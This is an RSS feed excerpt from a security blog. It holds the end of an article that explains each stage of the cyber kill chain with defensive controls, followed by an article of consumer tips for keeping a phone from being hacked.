Organizations should have measures to prevent the disclosure of sensitive information such as version numbers to the public. Security awareness training is also necessary to sensitize staff on social engineering tactics attackers would employ as well as how to dispose of sensitive information appropriately.</p><p>2. <strong><em>Weaponization</em></strong>. During weaponization, the threat actor develops malware crafted explicitly to the vulnerabilities discovered during the reconnaissance phase of the cyber kill chain. Based on the intelligence gathered in the reconnaissance phase, the attacker will tailor their toolset to meet the target network&apos;s specific requirements. For example, let us say the attacker found that the mail server version identified in the reconnaissance phase had an open relay vulnerability. Such a vulnerability would allow the attacker to send potentially malicious emails on behalf of internal staff. The best measure to have in place to mitigate against this phase is patch management. Ensuring that all your systems are up to date can make it difficult for attackers to weaponize findings from stage one. Again, security awareness training is critical for the human element of things.</p><p>3. <strong><em>Delivery</em></strong>. This stage of the cyber kill chain involves transmitting the malicious payload from the attacker to the target information system for exploitation. <a href="https://enterprise.verizon.com/resources/reports/DBIR_2018_Report_execsummary.pdf?ref=thecyberpatch.com">Research has shown</a> that a network attack is most likely to originate from a spear-phishing attack targeting an internal employee of the organization. For example, leveraging the open relay vulnerability, the attacker sends a crafted email carrying a link or document that would download the attacker&apos;s malware. The delivery path or vector is via email. 
Security awareness training is critical at this stage so that employees know to be wary of attachments or links within emails, even if they come from a trusted source.</p><p>4. <strong><em>Exploitation</em></strong>. During the cyber kill chain&apos;s exploitation phase, the attacker&apos;s malicious payload is executed on the target network through remote or local mechanisms. After executing, the malware can take advantage of discovered vulnerabilities to gain administrative access to the targeted organizational information system. For example, let&apos;s say an employee received the phishing email sent by the attacker via the open relay vulnerability and opened the document within the email because it appeared to be sent by the CEO of the company. Upon opening the document (stager), malicious code is executed in the background, giving the attacker remote access to the target network. At this phase, organizations can employ several controls to mitigate or even prevent such an event. The use of network and host intrusion detection and prevention systems is one such mechanism that can be used as a security control at this phase.</p><p>5. <strong><em>Installation</em></strong>. After successfully exploiting the targeted system, the malware moves to install itself onto the targeted information system. At this point, the malware begins to download additional payloads if network access is available. This approach allows the delivery payload size to remain small and undetectable. Because of its small size, the malware in this example would have limited functionality. Therefore, the malware will download additional components to have better control of the exploited information systems and to penetrate further into the target organization&apos;s network. 
A security control that could be implemented at this phase is a zero-trust approach.</p><p><a href="https://www.csoonline.com/article/3247848/what-is-zero-trust-a-model-for-more-effective-security.html?ref=thecyberpatch.com">Zero trust</a> is a security concept centered on the belief that organizations should not automatically trust anything inside or outside their perimeters. Instead, they must verify anything and everything trying to connect to their systems before granting access. Such an approach would mitigate against the installation of unverified software that could potentially be malicious.</p><p>6. <strong><em>Command and Control</em></strong>. Command and control, or C2 for short, is when the attacker has placed a management and communication mechanism within the payload that infected the target network. This mechanism allows the attacker to manage the malware in the environment remotely. It will enable the attacker to move deeper into the network, exfiltrate data, and deny service operations or conduct destruction. For example, the malware that infected the network is continuously listening on port 31337 for instructions on what action to carry out on the target machine. To mitigate against this, administrators should have adequately configured network access control lists so that malware cannot use ports that are not within a whitelisted range of ports.</p><p>7. <strong><em>Actions on Objectives</em></strong>. The activities and objectives of the malware are dependent on its specific mission. For example, the malware could be focused on data exfiltration, denial of service, or destruction. The deployment of honeypots across the network is a reasonable security control to implement to identify the actions and objectives of an attacker, and the malware delivered. A honeypot is a network-attached system set up as a decoy to lure attackers and to detect, deflect, or study hacking attempts to gain unauthorized access to information systems. 
The function of a honeypot is to represent itself on the internet as a potential target for attackers, usually a server or other high-value target, and to gather information and notify defenders of any attempts to access the honeypot by unauthorized users.</p><p>It is worth noting that no one security measure is 100% effective against cyber-attacks. Similar to how attackers may employ the cyber kill chain, organizations should employ a <a href="https://www.forcepoint.com/cyber-edu/defense-depth?ref=thecyberpatch.com">Defense in Depth</a> approach in protecting their assets. Defense in Depth is an approach to cybersecurity in which a series of defensive mechanisms are layered to protect valuable data and information. This multi-layered approach with intentional redundancies increases the security of a system and addresses many different attack vectors.</p>]]></content:encoded></item><item><title><![CDATA[How To Prevent Your Phone From Getting Hacked]]></title><description><![CDATA[There are many ways a hacker can get into your phone and steal personal and critical information. Here are a few tips to ensure that you are not a victim of phone hacking]]></description><link>https://thecyberpatch.com/mobile-phone-hacking-prevention-mechanisms/</link><guid isPermaLink="false">5fa6a7ddb985673fd74fff62</guid><category><![CDATA[Cyber Tips]]></category><dc:creator><![CDATA[Lomar Lilly]]></dc:creator><pubDate>Wed, 15 Apr 2020 16:22:00 GMT</pubDate><media:content url="https://thecyberpatch.com/content/images/2020/11/Hack-Android-Phone.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://thecyberpatch.com/content/images/2020/11/Hack-Android-Phone.jpg" alt="How To Prevent Your Phone From Getting Hacked"><p>According to <a href="https://www.mcafee.com/blogs/consumer/how-do-hackers-hack-phones-and-how-can-i-prevent-it/?ref=thecyberpatch.com">McAfee</a>, the threat of having your phone hacked has become a common and rational fear. 
The cold hard truth is that it is now possible to hack any phone. With the advancement of technology, where the discovery of knowledge and information advances the understanding of technology, hackers can hack even some of the most sophisticated phone software. There are many ways a hacker can get into your phone and steal personal and critical information. Here are a few tips to ensure that you are not a victim of phone hacking:</p><ol><li><strong><em>Keep up to date</em></strong>. Updating can be a tiresome and intrusive process. It even sometimes brings annoying changes to the interface you&#x2019;re not familiar with. However, installing software updates as soon as they become available is very important. This action is vital because many successful hacks typically exploit vulnerabilities that have already been patched via updates.<br><br>Additionally, avoid using unofficial tools to &#x201C;root&#x201D; your phone (known as &#x201C;jailbreaking&#x201D; on iOS). On a rooted/jailbroken phone, technical safeguards can be defeated, allowing apps to perform actions that are usually prohibited, such as accessing your personal data.<br></li><li><strong><em>Never leave your phone unattended</em></strong>. Keeping your phone with you at all times while in a public place is the first, best rule to follow. The easiest way for a hacker to steal your phone&apos;s information is to gain access to it &#x2014; therefore, it is always essential to keep your phone in your possession. If you have been away from your phone around a group of strangers and are concerned about possible hacking, check your settings, and look for strange apps. <br></li><li><strong><em>Turn off Wi-Fi and Bluetooth when not in use</em></strong>. It is easy for hackers to connect to your phone using Wi-Fi or Bluetooth, so turn them off when not needed because there is no warning when a hacker attacks you. 
If you fear being hacked in a public space, turning off your phone can block hackers&apos; ability to hack you. This is an effective preventative method. Users should avoid using unprotected Bluetooth and Wi-Fi networks.<br></li><li><strong><em>Encrypt Your Device</em></strong>. Encrypting your cell phone can save you from being hacked and can protect your calls, messages, and critical information. To check if a device is encrypted: iPhone users can go into Touch ID &amp; Passcode, scroll to the bottom, and enable Data protection. Android users have automatic encryption depending on the type of phone.<br></li><li><strong><em>Pay attention to App Permissions</em></strong>. Read app permissions and avoid downloading apps that request more access than they should need to operate. Even if an app&apos;s permissions seem to line up with its function, check reviews online. For Android, download an antivirus app such as McAfee or Bitdefender that will scan apps before download and flag suspicious activity on apps you do have.<br></li><li><strong><em>Avoid public charging stations</em></strong>. Do not plug into unknown devices; bring a wall charger. You might want to invest in a charge-only USB cable like <a href="https://www.pcworld.com/article/3454899/traveling-this-7-gadget-protects-your-phone-from-treacherous-usb-charging-ports.html?ref=thecyberpatch.com">PortaPow</a>. If a public computer is your only option to revive a dead battery, select the &quot;Charge only&quot; option (Android phones) if you get a pop-up when you plug in, or deny access from the other computer (iPhone).</li></ol>]]></content:encoded></item></channel></rss>